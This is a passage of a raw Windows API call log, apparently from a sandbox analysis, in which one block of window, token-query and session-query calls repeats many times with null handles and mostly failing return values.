WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.624] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.624] TextOutW (hdc=0x0, x=3354, y=8149, lpString="", c=0) returned 1 [0072.624] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.624] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.624] GetTickCount () returned 0x1f3e0 [0072.624] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.624] SetForegroundWindow (hWnd=0x0) returned 0 [0072.624] BringWindowToTop (hWnd=0x0) returned 0 [0072.624] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x770) returned 1 [0072.624] GetTokenInformation (in: TokenHandle=0x770, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.625] GetLastError () returned 0x7a [0072.625] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.625] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.625] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.625] TextOutW (hdc=0x0, x=3364, y=8174, lpString="", c=0) returned 1 [0072.625] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.625] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.625] GetTickCount () returned 0x1f3e0 [0072.626] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.626] SetForegroundWindow (hWnd=0x0) returned 0 [0072.626] BringWindowToTop (hWnd=0x0) returned 0 [0072.626] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x774) returned 1 [0072.626] GetTokenInformation (in: TokenHandle=0x774, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.626] GetLastError () returned 0x7a [0072.626] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.626] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.626] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.626] TextOutW (hdc=0x0, x=3374, y=8199, lpString="", c=0) returned 1 [0072.626] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.626] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.626] GetTickCount () returned 0x1f3e0 [0072.627] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.627] SetForegroundWindow (hWnd=0x0) returned 0 [0072.627] BringWindowToTop (hWnd=0x0) returned 0 [0072.627] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x778) returned 1 [0072.627] GetTokenInformation (in: TokenHandle=0x778, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.627] GetLastError () returned 0x7a [0072.627] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.627] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.628] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.628] TextOutW (hdc=0x0, x=3384, y=8224, lpString="", c=0) returned 1 [0072.628] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.628] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.628] GetTickCount () returned 0x1f3f0 [0072.629] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.629] SetForegroundWindow (hWnd=0x0) returned 0 [0072.629] BringWindowToTop (hWnd=0x0) returned 0 [0072.629] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x77c) returned 1 [0072.629] GetTokenInformation (in: TokenHandle=0x77c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.629] GetLastError () returned 0x7a [0072.629] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.629] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.630] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.630] TextOutW (hdc=0x0, x=3394, y=8249, lpString="", c=0) returned 1 [0072.630] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.630] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.630] GetTickCount () returned 0x1f3f0 [0072.631] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.631] SetForegroundWindow (hWnd=0x0) returned 0 [0072.631] BringWindowToTop (hWnd=0x0) returned 0 [0072.631] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x780) returned 1 [0072.631] GetTokenInformation (in: TokenHandle=0x780, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.631] GetLastError () returned 0x7a [0072.631] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.631] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.632] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.632] TextOutW (hdc=0x0, x=3404, y=8274, lpString="", c=0) returned 1 [0072.632] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.632] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.632] GetTickCount () returned 0x1f3f0 [0072.632] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.632] SetForegroundWindow (hWnd=0x0) returned 0 [0072.632] BringWindowToTop (hWnd=0x0) returned 0 [0072.632] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x784) returned 1 [0072.632] GetTokenInformation (in: TokenHandle=0x784, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.632] GetLastError () returned 0x7a [0072.632] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.632] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.633] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.633] TextOutW (hdc=0x0, x=3414, y=8299, lpString="", c=0) returned 1 [0072.633] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.633] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.633] GetTickCount () returned 0x1f3f0 [0072.634] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.634] SetForegroundWindow (hWnd=0x0) returned 0 [0072.634] BringWindowToTop (hWnd=0x0) returned 0 [0072.634] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x788) returned 1 [0072.634] GetTokenInformation (in: TokenHandle=0x788, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.634] GetLastError () returned 0x7a [0072.634] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.634] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.634] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.634] TextOutW (hdc=0x0, x=3424, y=8324, lpString="", c=0) returned 1 [0072.634] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.634] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.635] GetTickCount () returned 0x1f3f0 [0072.635] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.635] SetForegroundWindow (hWnd=0x0) returned 0 [0072.635] BringWindowToTop (hWnd=0x0) returned 0 [0072.635] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x78c) returned 1 [0072.635] GetTokenInformation (in: TokenHandle=0x78c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.635] GetLastError () returned 0x7a [0072.635] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.635] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.636] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.636] TextOutW (hdc=0x0, x=3434, y=8349, lpString="", c=0) returned 1 [0072.636] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.636] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.636] GetTickCount () returned 0x1f3f0 [0072.637] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.637] SetForegroundWindow (hWnd=0x0) returned 0 [0072.637] BringWindowToTop (hWnd=0x0) returned 0 [0072.637] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x790) returned 1 [0072.637] GetTokenInformation (in: TokenHandle=0x790, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.637] GetLastError () returned 0x7a [0072.637] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.637] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.637] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.637] TextOutW (hdc=0x0, x=3444, y=8374, lpString="", c=0) returned 1 [0072.637] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.637] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.637] GetTickCount () returned 0x1f3f0 [0072.638] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.638] SetForegroundWindow (hWnd=0x0) returned 0 [0072.638] BringWindowToTop (hWnd=0x0) returned 0 [0072.638] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x794) returned 1 [0072.638] GetTokenInformation (in: TokenHandle=0x794, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.638] GetLastError () returned 0x7a [0072.638] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.638] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.639] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.639] TextOutW (hdc=0x0, x=3454, y=8399, lpString="", c=0) returned 1 [0072.639] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.639] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.639] GetTickCount () returned 0x1f3f0 [0072.640] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.640] SetForegroundWindow (hWnd=0x0) returned 0 [0072.640] BringWindowToTop (hWnd=0x0) returned 0 [0072.640] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x798) returned 1 [0072.640] GetTokenInformation (in: TokenHandle=0x798, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.640] GetLastError () returned 0x7a [0072.640] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.640] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.640] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.640] TextOutW (hdc=0x0, x=3464, y=8424, lpString="", c=0) returned 1 [0072.640] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.640] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.640] GetTickCount () returned 0x1f3f0 [0072.642] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.642] SetForegroundWindow (hWnd=0x0) returned 0 [0072.642] BringWindowToTop (hWnd=0x0) returned 0 [0072.642] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x79c) returned 1 [0072.642] GetTokenInformation (in: TokenHandle=0x79c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.642] GetLastError () returned 0x7a [0072.642] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.642] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.642] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.642] TextOutW (hdc=0x0, x=3474, y=8449, lpString="", c=0) returned 1 [0072.642] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.642] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.643] GetTickCount () returned 0x1f3f0 [0072.643] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.643] SetForegroundWindow (hWnd=0x0) returned 0 [0072.643] BringWindowToTop (hWnd=0x0) returned 0 [0072.643] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7a0) returned 1 [0072.643] GetTokenInformation (in: TokenHandle=0x7a0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.643] GetLastError () returned 0x7a [0072.643] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.643] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.644] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.644] TextOutW (hdc=0x0, x=3484, y=8474, lpString="", c=0) returned 1 [0072.644] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.644] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.644] GetTickCount () returned 0x1f400 [0072.645] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.645] SetForegroundWindow (hWnd=0x0) returned 0 [0072.645] BringWindowToTop (hWnd=0x0) returned 0 [0072.645] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7a4) returned 1 [0072.645] GetTokenInformation (in: TokenHandle=0x7a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.645] GetLastError () returned 0x7a [0072.645] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.645] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.645] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.645] TextOutW (hdc=0x0, x=3494, y=8499, lpString="", c=0) returned 1 [0072.645] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.645] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.646] GetTickCount () returned 0x1f400 [0072.646] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.646] SetForegroundWindow (hWnd=0x0) returned 0 [0072.646] BringWindowToTop (hWnd=0x0) returned 0 [0072.646] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7a8) returned 1 [0072.646] GetTokenInformation (in: TokenHandle=0x7a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.646] GetLastError () returned 0x7a [0072.646] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.646] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.647] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.647] TextOutW (hdc=0x0, x=3504, y=8524, lpString="", c=0) returned 1 [0072.647] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.647] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.647] GetTickCount () returned 0x1f400 [0072.648] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.649] SetForegroundWindow (hWnd=0x0) returned 0 [0072.649] BringWindowToTop (hWnd=0x0) returned 0 [0072.649] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7ac) returned 1 [0072.649] GetTokenInformation (in: TokenHandle=0x7ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.649] GetLastError () returned 0x7a [0072.649] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.649] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.649] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.649] TextOutW (hdc=0x0, x=3514, y=8549, lpString="", c=0) returned 1 [0072.649] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.649] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.649] GetTickCount () returned 0x1f400 [0072.654] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.654] SetForegroundWindow (hWnd=0x0) returned 0 [0072.654] BringWindowToTop (hWnd=0x0) returned 0 [0072.654] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7b0) returned 1 [0072.654] GetTokenInformation (in: TokenHandle=0x7b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.654] GetLastError () returned 0x7a [0072.654] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.654] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.655] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.655] TextOutW (hdc=0x0, x=3524, y=8574, lpString="", c=0) returned 1 [0072.655] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.655] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.655] GetTickCount () returned 0x1f400 [0072.656] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.656] SetForegroundWindow (hWnd=0x0) returned 0 [0072.656] BringWindowToTop (hWnd=0x0) returned 0 [0072.656] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7b4) returned 1 [0072.656] GetTokenInformation (in: TokenHandle=0x7b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.656] GetLastError () returned 0x7a [0072.656] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.656] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.657] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.657] TextOutW (hdc=0x0, x=3534, y=8599, lpString="", c=0) returned 1 [0072.657] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.657] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.657] GetTickCount () returned 0x1f400 [0072.657] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.657] SetForegroundWindow (hWnd=0x0) returned 0 [0072.657] BringWindowToTop (hWnd=0x0) returned 0 [0072.657] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7b8) returned 1 [0072.657] GetTokenInformation (in: TokenHandle=0x7b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.657] GetLastError () returned 0x7a [0072.657] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.657] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.658] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.658] TextOutW (hdc=0x0, x=3544, y=8624, lpString="", c=0) returned 1 [0072.658] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.658] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.658] GetTickCount () returned 0x1f400 [0072.658] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.659] SetForegroundWindow (hWnd=0x0) returned 0 [0072.659] BringWindowToTop (hWnd=0x0) returned 0 [0072.659] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x7bc) returned 1 [0072.659] GetTokenInformation (in: TokenHandle=0x7bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.659] GetLastError () returned 0x7a [0072.659] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.659] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.660] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.660] TextOutW (hdc=0x0, x=3554, y=8649, lpString="", c=0) returned 1 [0072.660] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.660] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.660] 